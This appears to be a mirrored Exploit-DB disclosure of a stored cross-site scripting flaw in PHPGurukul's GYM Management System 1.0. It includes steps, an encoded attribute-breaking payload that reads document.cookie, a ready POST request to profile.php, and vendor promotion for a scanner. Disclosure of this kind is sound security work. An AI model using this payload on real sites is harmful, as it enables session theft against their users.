bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51777.txt
Exploit-DB 0c65b881ba DB: 2024-02-06 
10 changes to exploits/shellcodes/ghdb

Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption

WhatsUp Gold 2022 (22.1.0 Build 39) - XSS

Clinic's Patient Management System 1.0 - Unauthenticated RCE

Curfew e-Pass Management System 1.0 - FromDate SQL Injection

GYM MS - GYM Management System - Cross Site Scripting (Stored)

MISP 2.4.171 - Stored XSS

TASKHUB-2.8.8 - XSS-Reflected

Wordpress 'simple urls' Plugin < 115 - XSS
2024-02-06 00:16:29 +00:00

36 lines
No EOL
1.9 KiB
Text
Raw Permalink Blame History

# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)
# Date: 29/09/2023
# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip
# Version: 1.0
# Last Update: 31 August 2022
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
# 1: Create user, login and go to profile.php
# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.
# 3: When entering the profile.php page, document.cookie will be reflected every time.
# Author
This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.
# About Rapplex
Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.
Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.
So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines.
"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.
# HTTP Request
POST /gym/profile.php HTTP/1.1
Host: localhost
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE
Connection: close
fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update
Reference in a new issue View git blame Copy permalink